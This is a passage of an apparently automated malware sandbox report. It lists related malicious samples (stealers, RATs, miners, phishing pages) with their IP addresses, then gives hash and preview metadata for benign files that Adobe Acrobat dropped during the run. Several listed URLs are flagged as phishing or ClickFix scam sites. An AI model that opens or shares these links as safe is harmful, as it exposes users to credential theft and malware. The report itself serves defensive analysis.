                                                                Globalfoundries eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                CLOUDFLARENETUSGTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                • 188.114.96.3
                                                                GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                • 188.114.97.3
                                                                https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~juswGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                https://t.co/sSZe0hnReUGet hashmaliciousUnknownBrowse
                                                                • 172.66.0.227
                                                                dog.jpg.exeGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                random.exeGet hashmaliciousCStealerBrowse
                                                                • 162.159.128.233
                                                                random.exeGet hashmaliciousCStealerBrowse
                                                                • 172.67.74.152
                                                                audio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                • 162.159.135.232
                                                                QoRXFaE8Xn.exeGet hashmaliciousDCRatBrowse
                                                                • 188.114.96.3
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                28a2c9bd18a11de089ef85a160da29e43lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                • 13.107.246.254
                                                                http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                • 13.107.246.254
                                                                NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousXmrigBrowse
                                                                • 13.107.246.254
                                                                https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.atGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.254
                                                                installeasyassist.exeGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.254
                                                                search.htaGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.254
                                                                Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.254
                                                                Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.254
                                                                jqplot.htaGet hashmaliciousUnknownBrowse
                                                                • 13.107.246.254
                                                                http://aselog24x7.cl/Get hashmaliciousHTMLPhisherBrowse
                                                                • 13.107.246.254
                                                                No context
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):290
                                                                Entropy (8bit):5.2401416330468775
                                                                Encrypted:false
                                                                SSDEEP:6:iOp/5Db+q2PRN2nKuAl9OmbnIFUtL/5DqZmwl/5DGVkwORN2nKuAl9OmbjLJ:7p/52vaHAahFUtL/52/l/5K5JHAaSJ
                                                                MD5:E9ACB38856AF7A24FBD441DA7D6DFF67
                                                                SHA1:7DDE049D06B14A6BAC1E2B1052A1AAB6AA15110F
                                                                SHA-256:84622B7BAFC641E34A0E4DFFD5259EDC9F70A592958D6A931D772CD26F201B8D
                                                                SHA-512:4B1A3E01531E3B42E6EA7B150826A36B30C4C7E46A480964CF2F331FF6509FEB118FF5FD9743166D4BBD36567E29098D21A723EA032AC4EACD4DA182078A4DB7
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:2025/01/07-16:34:36.701 1848 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-16:34:36.706 1848 Recovering log #3.2025/01/07-16:34:36.706 1848 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):290
                                                                Entropy (8bit):5.2401416330468775
                                                                Encrypted:false
                                                                SSDEEP:6:iOp/5Db+q2PRN2nKuAl9OmbnIFUtL/5DqZmwl/5DGVkwORN2nKuAl9OmbjLJ:7p/52vaHAahFUtL/52/l/5K5JHAaSJ
                                                                MD5:E9ACB38856AF7A24FBD441DA7D6DFF67
                                                                SHA1:7DDE049D06B14A6BAC1E2B1052A1AAB6AA15110F
                                                                SHA-256:84622B7BAFC641E34A0E4DFFD5259EDC9F70A592958D6A931D772CD26F201B8D
                                                                SHA-512:4B1A3E01531E3B42E6EA7B150826A36B30C4C7E46A480964CF2F331FF6509FEB118FF5FD9743166D4BBD36567E29098D21A723EA032AC4EACD4DA182078A4DB7
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:2025/01/07-16:34:36.701 1848 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-16:34:36.706 1848 Recovering log #3.2025/01/07-16:34:36.706 1848 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):334
                                                                Entropy (8bit):5.2073089060907245
                                                                Encrypted:false
                                                                SSDEEP:6:iOp/5vUN9+q2PRN2nKuAl9Ombzo2jMGIFUtL/5v3JZmwl/5va9VkwORN2nKuAl97:7p/5NvaHAa8uFUtL/5x/l/585JHAa8RJ
                                                                MD5:D653BD2A6A5CCE04C32D9180F61FD361
                                                                SHA1:9C1BADF631FC769128DAABCB120575D123EAEC59
                                                                SHA-256:5567F345F37CDC2E89DED749D85D3A322952726A334F6DA844DB394802CA36F0
                                                                SHA-512:E0BBAA43833CC69998A51113E77728AE6BB6D09419CEE8EC971469E11DBE2DE5F05098E922C91FCFADB139EB80E7778BCBC731E302DD018B634D568EC0AFA685
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:2025/01/07-16:34:36.560 1808 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-16:34:36.563 1808 Recovering log #3.2025/01/07-16:34:36.564 1808 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):334
                                                                Entropy (8bit):5.2073089060907245
                                                                Encrypted:false
                                                                SSDEEP:6:iOp/5vUN9+q2PRN2nKuAl9Ombzo2jMGIFUtL/5v3JZmwl/5va9VkwORN2nKuAl97:7p/5NvaHAa8uFUtL/5x/l/585JHAa8RJ
                                                                MD5:D653BD2A6A5CCE04C32D9180F61FD361
                                                                SHA1:9C1BADF631FC769128DAABCB120575D123EAEC59
                                                                SHA-256:5567F345F37CDC2E89DED749D85D3A322952726A334F6DA844DB394802CA36F0
                                                                SHA-512:E0BBAA43833CC69998A51113E77728AE6BB6D09419CEE8EC971469E11DBE2DE5F05098E922C91FCFADB139EB80E7778BCBC731E302DD018B634D568EC0AFA685
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:2025/01/07-16:34:36.560 1808 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-16:34:36.563 1808 Recovering log #3.2025/01/07-16:34:36.564 1808 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):403
                                                                Entropy (8bit):4.953858338552356
                                                                Encrypted:false
                                                                SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):403
                                                                Entropy (8bit):4.953858338552356
                                                                Encrypted:false
                                                                SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):403
                                                                Entropy (8bit):4.953858338552356
                                                                Encrypted:false
                                                                SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):403
                                                                Entropy (8bit):4.984477229844467
                                                                Encrypted:false
                                                                SSDEEP:12:YHO8sqG5sBdOg2Hlcaq3QYiubrP7E4T3y:YXs+dMHE3QYhbz7nby
                                                                MD5:5F77D194A8553AB3ED12580865D0CA13
                                                                SHA1:9986C4B659E6D3EE623D8166099B4A65E2517E57
                                                                SHA-256:399F97B308B5C69361751BD9FDB25B4302764E23D67CCBFE53FD733519C4961A
                                                                SHA-512:8636AA106686EF1FB7BFDF49F1777AAB68B42C81B7BD93E2C0ADA2A87025696FBEF5497986185A93975EF64BB77356F80FF45B1BF4962BEBE5FFF983599F8DC9
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380845688658742","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":122639},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4509
                                                                Entropy (8bit):5.231114015999101
                                                                Encrypted:false
                                                                SSDEEP:96:OLSw0bSwIAnrRqLX2rSq1OUxu/0OZ0xRBTxekN8xertGoxfoZ:OLT0bTIeYa51Ogu/0OZARBT8kN88rtRk
                                                                MD5:EB18A9125515EE4E0940FD974E5BF107
                                                                SHA1:85C3ED71AD782677978AEAE7378E8B4BE5BB2A34
                                                                SHA-256:25C341CB54B2E81D6A27C44E40864895AD94A62E293B09ABB3F270B17CAE24AB
                                                                SHA-512:28F6F9F34FFF6A7B2A92B846709161B72940B277E50C8255184F98230B98996BFC15C08F6CCC33AF260177B3781014B594D096EB22CD4FE6A33F9136C2D56F9E
                                                                Malicious:false
                                                                Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):322
                                                                Entropy (8bit):5.2441681709576295
                                                                Encrypted:false
                                                                SSDEEP:6:iOp/5HaNN9+q2PRN2nKuAl9OmbzNMxIFUtL/5H+JZmwl/5HV9VkwORN2nKuAl9Ob:7p/56NOvaHAa8jFUtL/5Y/l/595JHAab
                                                                MD5:2F90F1B02C0EE1AE4B90AC2210C36FC5
                                                                SHA1:7B6B6ECCB263947EAF941927FED6D2B4F016CED6
                                                                SHA-256:9ACACA99144B77505016BDF08BFD264CED2BF6BDCDFA8B9C466641499551392D
                                                                SHA-512:20BB8410D918D48F3B2E6CBA5BAA77304212A9E8F2D4D5D9873E129FBFA364019A6D25A8493A97434521495B3975BEFE5275FBBD1CB9E16E1E0C3BEF23F12109
                                                                Malicious:false
                                                                Preview:2025/01/07-16:34:36.746 1808 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-16:34:36.748 1808 Recovering log #3.2025/01/07-16:34:36.749 1808 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):322
                                                                Entropy (8bit):5.2441681709576295
                                                                Encrypted:false
                                                                SSDEEP:6:iOp/5HaNN9+q2PRN2nKuAl9OmbzNMxIFUtL/5H+JZmwl/5HV9VkwORN2nKuAl9Ob:7p/56NOvaHAa8jFUtL/5Y/l/595JHAab
                                                                MD5:2F90F1B02C0EE1AE4B90AC2210C36FC5
                                                                SHA1:7B6B6ECCB263947EAF941927FED6D2B4F016CED6
                                                                SHA-256:9ACACA99144B77505016BDF08BFD264CED2BF6BDCDFA8B9C466641499551392D
                                                                SHA-512:20BB8410D918D48F3B2E6CBA5BAA77304212A9E8F2D4D5D9873E129FBFA364019A6D25A8493A97434521495B3975BEFE5275FBBD1CB9E16E1E0C3BEF23F12109
                                                                Malicious:false
                                                                Preview:2025/01/07-16:34:36.746 1808 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-16:34:36.748 1808 Recovering log #3.2025/01/07-16:34:36.749 1808 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                Category:dropped
                                                                Size (bytes):71190
                                                                Entropy (8bit):1.0532103904134105
                                                                Encrypted:false
                                                                SSDEEP:192:8p+tkoD0X79L30ZyhVmPAfqYFoNqVCG48f89ZSagq7MlIydj:8p+tkJX7F30ohWWJ
                                                                MD5:CCFC97239567B159D391D94E0E5F4E1B
                                                                SHA1:889DF37BFA6E9981C8144618940D418E01E55706
                                                                SHA-256:3A5D4191821BDDD98F26F275ECFB0C70A4C4CC4A39C0F71D94E17F99EB11B234
                                                                SHA-512:792542B2598F6EB067FA706C9D0B509C7D45BAE958CDB964C3D8AFB38AF47A0CDA3259531C850AD7E7ED493EA4DF02748F5A94722DDE9F7200BBA30BB5DABD36
                                                                Malicious:false
                                                                Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):57344
                                                                Entropy (8bit):3.291927920232006
                                                                Encrypted:false
                                                                SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                                                                MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                                SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                                SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                                SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite Rollback Journal
                                                                Category:dropped
                                                                Size (bytes):16928
                                                                Entropy (8bit):1.2141549776970906
                                                                Encrypted:false
                                                                SSDEEP:24:7+tsbqLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzm+Z2:7MgqLmFTIF3XmHjBoGGR+jMz+LhL
                                                                MD5:18C153608C3809B6486F88B3E1C2232C
                                                                SHA1:A5169CBE498BA5293BA8109F9BE370C159B014EA
                                                                SHA-256:5812F958347A3437DDECAE5D41F2FF4E58BE5272132B9D3EE9FDD376C8CCB9BF
                                                                SHA-512:4FF7A14BC1F0BFDA00582CAD416008C0B061BAE74019649F2BCAFE023ED75BF126D318C65779C31A2FB833B1BF0BF66DB020431415EA3386E163C52F20588CCD
                                                                Malicious:false
                                                                Preview:.... .c......M.2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:Certificate, Version=3
                                                                Category:dropped
                                                                Size (bytes):1391
                                                                Entropy (8bit):7.705940075877404
                                                                Encrypted:false
                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                Malicious:false
                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):71954
                                                                Entropy (8bit):7.996617769952133
                                                                Encrypted:true
                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                Malicious:false
                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):192
                                                                Entropy (8bit):2.756901573172974
                                                                Encrypted:false
                                                                SSDEEP:3:kkFklCJfuE+klfllXlE/HT8kqKtNNX8RolJuRdxLlGB9lQRYwpDdt:kKbRuEbmT8qNMa8RdWBwRd
                                                                MD5:FE8DC7DD68F37328F5FBCCA5D16B737E
                                                                SHA1:2D0CBE59D70C33C2F7D41D0CE8E81F8D1C6EB3FE
                                                                SHA-256:9D097EEC02C24602871124EB1E5BC704AA46EDC1FB1FA0ECA7914769CBF09B8A
                                                                SHA-512:26F65CC50FB41C755F892992944E1C1CB926970C0B23D044E380C813DC2E7D1B2643B76F8B559BF4584730B48F9C0AB125A0B681EBB6C179719B1EA43BB8A4E8
                                                                Malicious:false
                                                                Preview:p...... .........,b.Ka..(....................................................... ..........W.....e..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):328
                                                                Entropy (8bit):3.223083948084945
                                                                Encrypted:false
                                                                SSDEEP:6:kKFPg9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:lLDImsLNkPlE99SNxAhUe/3
                                                                MD5:F35613A8BA6FEEB5A4B77A2DC275AEBE
                                                                SHA1:2C0A6596BC48926A670E5BF18EC22A1244A02A48
                                                                SHA-256:2BE947E6182CD8B018A3FBD22CFBCC7A95781BE236383C82931DFAD1A7301FFC
                                                                SHA-512:A2DB0E5C0F87FE7C92AEB22569139E5B863AC56B393A8B7A391C95AA32DED3343D4F07292FFC0140F8067CA86D68D09608F3BC89284471B2AE6B7A2C6BCAF84A
                                                                Malicious:false
                                                                Preview:p...... ........c..La..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PostScript document text
                                                                Category:dropped
                                                                Size (bytes):1233
                                                                Entropy (8bit):5.233980037532449
                                                                Encrypted:false
                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                Malicious:false
                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PostScript document text
                                                                Category:dropped
                                                                Size (bytes):1233
                                                                Entropy (8bit):5.233980037532449
                                                                Encrypted:false
